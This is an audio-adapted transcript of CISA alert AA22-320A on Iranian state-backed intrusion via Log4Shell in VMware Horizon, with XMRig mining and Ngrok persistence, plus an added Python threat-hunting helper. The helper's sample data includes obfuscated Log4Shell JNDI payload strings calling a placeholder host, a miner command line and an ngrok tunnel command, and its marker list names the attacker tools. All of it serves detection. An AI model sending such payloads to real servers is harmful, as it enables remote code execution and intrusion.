CISA Alert AA22-320A – Iranian government-sponsored APT actors compromise federal network, deploy crypto miner, credential harvester.
This is a CISA Cybersecurity Alert. ID number Alpha Alpha Two Two tack Three Two Zero Alpha.
Original release date – November Sixteenth, twenty twenty two.
From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch organization where CISA observed suspected APT activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. CISA and the FBI assess that the network was compromised by Iranian government-sponsored APT actors.
CISA and the FBI are releasing this alert to provide the suspected Iranian government-sponsored actors’ TTPs and indicators of compromise to help network defenders detect and protect against related compromises.
CISA and the FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on IOCs or TTPs described in this alert, CISA and the FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems and the domain controller, and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this alert to protect against similar malicious cyber activity.
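As an added defender-side example, not taken from the alert or from CISA, the following Python helper supports the threat hunting recommended above for two of the artefacts described: Log4Shell exploitation attempts in web request logs (including the nested-lookup obfuscation that hides the JNDI string) and XMRig or Ngrok processes in a host inventory. The log lines, hostnames, process list and 198.51.100.x addresses are constructed sample data, not indicators from the alert.

```python
import re

# Innermost ${...} lookup, i.e. one with no further lookup nested inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Substrings tied to the tooling named in the alert (XMRig miner, Ngrok tunnels).
_TOOL_MARKERS = ("xmrig", "ngrok", "stratum+tcp://")

def _resolve_one(body: str):
    """Evaluate an obfuscation lookup (lower/upper/default value) to its literal."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${x:y:-default} evaluates to default
        return body.split(":-", 1)[1]
    return None

def deobfuscate(s: str) -> str:
    """Collapse nested lookups such as ${${lower:j}ndi:...} into ${jndi:...}."""
    def sub(m: re.Match) -> str:
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return m.group(0)             # keep the payload lookup itself
        r = _resolve_one(body)
        return r if r is not None else body  # unknown lookup: drop the braces
    while True:
        nxt = _INNER.sub(sub, s)
        if nxt == s:
            return nxt
        s = nxt

def hunt_logs(lines):
    """Return the request-log lines carrying a (possibly obfuscated) JNDI lookup."""
    return [ln for ln in lines if re.search(r"\$\{jndi:", deobfuscate(ln), re.I)]

def hunt_processes(procs):
    """Return (host, name) for processes whose name or command line matches a marker."""
    return [(host, name) for host, name, cmd in procs
            if any(mk in f"{name} {cmd}".lower() for mk in _TOOL_MARKERS)]

# Constructed sample data, not from the alert; 198.51.100.0/24 is a documentation range.
SAMPLE_LOGS = [
    '10.0.0.5 "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 "GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://198.51.100.7/x}"',
    '10.0.0.9 "POST /broker/xml HTTP/1.1" 200 "${jnd${env:NOPE:-i}:ldap://198.51.100.7/y}"',
]
SAMPLE_PROCS = [
    ("horizon-01", "java.exe", "java.exe -jar broker.jar"),
    ("horizon-01", "xmrig.exe", "xmrig.exe -o stratum+tcp://198.51.100.8:3333"),
    ("dc-01", "ngrok.exe", "ngrok.exe tcp 3389"),
]
```

A hit from `hunt_logs` on the Horizon front end is the cue to pivot to the domain controller and privileged accounts, as the alert advises, rather than treating the web host in isolation.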
The alert documentation linked in the show notes includes additional technical details related to this APT activity, indicators of compromise, TTPs, incident response recommendations, and mitigation actions.
To report incidents and anomalous activity or to request incident response resources or technical assistance, contact CISA at email@example.com, or call (888) 282-0870, or report incidents to your local FBI field office.
This report was written by CISA, the United States Cybersecurity and Infrastructure Security Agency, and edited and adapted for audio by the CyberWire as a public service. Please visit www dot cisa dot gov to read the full report which may include additional details, links, and illustrations. A link to this report can be found in the show notes.
This has been a CISA Cybersecurity Alert.